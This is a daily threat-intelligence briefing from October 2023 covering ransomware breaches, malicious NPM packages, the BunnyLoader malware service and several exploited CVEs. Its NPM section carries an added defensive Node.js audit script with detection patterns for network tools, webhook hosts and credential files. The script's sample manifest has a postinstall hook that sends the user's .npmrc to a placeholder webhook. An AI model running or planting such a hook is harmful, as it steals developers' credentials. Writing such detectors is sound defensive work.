
Cyware Daily Threat Intelligence


Daily Threat Briefing Oct 3, 2023

In a rare occurrence, two CVEs were assigned to a critical security flaw known as the Libwebp flaw; the second CVE was rejected shortly after. Several top firms warned of active exploitation of the flaw to achieve RCE and urged users to apply the patch immediately. Nevertheless, this isn’t the only security issue that cybercriminals are capitalizing on. Vulnerabilities in JetBrains TeamCity and Mali GPU drivers have also come under attack by adversaries. Separately, nine sets of malicious NPM packages were observed stealing sensitive data using webhooks or file-sharing links.

Moving on, a new Malware-as-a-Service (MaaS) is gaining popularity among cybercriminals due to its feature-rich nature and low cost. Dubbed BunnyLoader, the malware targets web browsers, cryptocurrency wallets, VPN clients, and messaging apps to steal various sensitive information.

Top Breaches Reported in the Last 24 Hours

Ransomware group attacks pharma firm

The Lorenz ransomware group claimed responsibility for a cyberattack on Allcare Pharmacy, which exposed its client information. While Allcare Pharmacy has not issued an official response, the threat actors have shared parts of the stolen data as evidence. Lorenz ransomware has been targeting high-profile organizations since 2021.

Motel One Group confirms ransomware attack

Motel One Group, a budget hotel chain, confirmed experiencing a ransomware attack by the BlackCat ransomware group. The attackers accessed customer information, including 150 credit card details, and have claimed to have exfiltrated approximately 6TB of data, including 24 million files. The company stated that while the attackers attempted to deploy file-encrypting ransomware, their efforts were only partially successful and business operations were not at risk.

Patient data leaked by ECHN

The cyberattack against the Eastern Connecticut Health Network (ECHN) in August resulted in the theft of employee and patient names, SSNs, confidential health information, and financial information, according to Prospect Medical Holdings, ECHN's parent company. Criminals accessed and acquired files containing information on employees and dependents of Waterbury Hospital, Rockville General Hospital, and Manchester Memorial Hospital. Notification letters were also sent to 24,130 Connecticut residents.

MEDUSA ransomware operators strike again

The notorious MEDUSA ransomware group has resurfaced, targeting two high-profile companies: Karam Chand Thapar & Bros. in India and Windak Group in Sweden. The threat actors have demanded $200,000 and $100,000 in ransom, respectively, with a deadline of 10 days. The MEDUSA group's dark web portal listed both victims, continuing a recent spree of attacks. The group is known for double extortion tactics and primarily targeting Windows systems through phishing campaigns and exploiting vulnerable RDP servers.

Top Malware Reported in the Last 24 Hours

Numerous malicious NPM packages discovered

Researchers at FortiGuard Labs uncovered nine sets of malicious NPM packages designed to steal sensitive data, including system information, user credentials, and source code. These malicious packages use install scripts to exfiltrate data to webhooks or file-sharing links, potentially compromising the security of any system on which they are installed. The packages were discovered using a system designed to detect malicious open-source packages across multiple ecosystems. Researchers categorized these packages based on their intentions and tactics.
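The briefing notes that these packages do their work from npm install scripts. The following is an added defender-side example, not code from the briefing or from FortiGuard Labs: a small Node.js audit that parses a package.json, looks only at lifecycle hooks that run at install time, and flags commands that invoke network tools, reference webhook or file-sharing endpoints, or read credential files. The indicator lists, the `webhook.example` host and the sample manifest are constructed for illustration and are not indicators taken from the reported packages.

```javascript
// Added example: audit npm lifecycle scripts for install-time exfiltration patterns.
// Not part of the Cyware briefing or the FortiGuard Labs research; indicators below
// are constructed and intentionally conservative. Tune them for your own environment.

// Hooks npm runs automatically during `npm install` of a dependency.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Constructed indicator sets. A legitimate package rarely needs any of these at install time.
const NETWORK_TOOLS = /\b(curl|wget|nc|ncat|Invoke-WebRequest|fetch)\b/i;
const SUSPICIOUS_HOSTS = /(webhooks?\.|\/api\/webhooks\/|hooks\.slack\.com|transfer\.sh|file\.io|pastebin\.com)/i;
const CREDENTIAL_PATHS = /(\.npmrc|\.ssh\/|\.git-credentials|\.aws\/credentials)/;
const RUNS_SCRIPT_FILE = /\bnode\s+\S+\.js\b/;

// Returns an array of findings: { hook, command, reasons[] } for each suspicious hook.
function auditLifecycleScripts(manifestText) {
  const pkg = JSON.parse(manifestText);
  const scripts = pkg.scripts || {};
  const findings = [];

  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;

    const reasons = [];
    if (NETWORK_TOOLS.test(cmd)) reasons.push("network tool invoked in install hook");
    if (SUSPICIOUS_HOSTS.test(cmd)) reasons.push("webhook or file-sharing endpoint referenced");
    if (CREDENTIAL_PATHS.test(cmd)) reasons.push("credential or config file read");
    // The risky logic may live in a separate JS file rather than the one-liner itself.
    if (RUNS_SCRIPT_FILE.test(cmd)) reasons.push("runs a script file at install time; review it");

    if (reasons.length > 0) findings.push({ hook, command: cmd, reasons });
  }
  return findings;
}

// Constructed sample manifest: a postinstall hook that posts the user's .npmrc to a webhook.
const SAMPLE_MANIFEST = JSON.stringify({
  name: "example-utils", // constructed package name
  version: "1.0.0",
  scripts: {
    test: "node test.js", // not a lifecycle hook; ignored by the audit
    postinstall: "curl -s -X POST -d \"$(cat ~/.npmrc)\" https://webhook.example/hook/abc123"
  }
});

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(auditLifecycleScripts(SAMPLE_MANIFEST), null, 2));
}
```

Run it against the package.json of each dependency in node_modules before allowing a build to proceed, or as a pre-merge check on lockfile changes. A hit is a review trigger rather than proof of malice; native-addon packages legitimately run `node-gyp rebuild` in `install`, which this audit does not flag. Pairing the check with `npm install --ignore-scripts` in CI removes the automatic execution path entirely.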

New fileless MaaS operation

Security researchers have identified a new MaaS called BunnyLoader advertised on hacker forums as a fileless loader with the ability to steal and replace the contents of the system clipboard. The malware appears to be under development and boasts features such as downloading and executing payloads, keylogging, credential stealing, clipboard manipulation, and remote command execution. Additionally, the malware supports multiple anti-detection mechanisms.

Top Vulnerabilities Reported in the Last 24 Hours

Ransomware gangs abuse JetBrains TeamCity flaw

Multiple ransomware groups are reportedly targeting a recently patched critical vulnerability in JetBrains' TeamCity continuous integration and deployment server. Tracked as CVE-2023-42793, with a 9.8/10 severity score, the flaw allows unauthenticated attackers to gain remote code execution after exploiting an authentication bypass weakness. Technical details of the vulnerability were published one week after JetBrains released the patch.

Active exploitation of Libwebp bug

Several companies have released advisories addressing the impact of an actively exploited Libwebp vulnerability tracked as CVE-2023-4863. The flaw concerns the WebP component in web browsers and applications using the Libwebp library. Although both Apple and Google patched similar vulnerabilities in their products, Google initially assigned a new CVE identifier (CVE-2023-5129) for Libwebp, but later rejected it. The vulnerability could lead to arbitrary code execution.

Arm patches Mali GPU Kernel Driver bug

Arm issued security patches for a security flaw in its Mali GPU Kernel Driver. Identified as CVE-2023-4211, the vulnerability is being actively exploited. It could allow a local non-privileged user to access already freed memory through improper GPU memory processing operations. The flaw impacts various driver versions, including the Midgard GPU Kernel Driver, Bifrost GPU Kernel Driver, Valhall GPU Kernel Driver, and Arm 5th Gen GPU Architecture Kernel Driver.
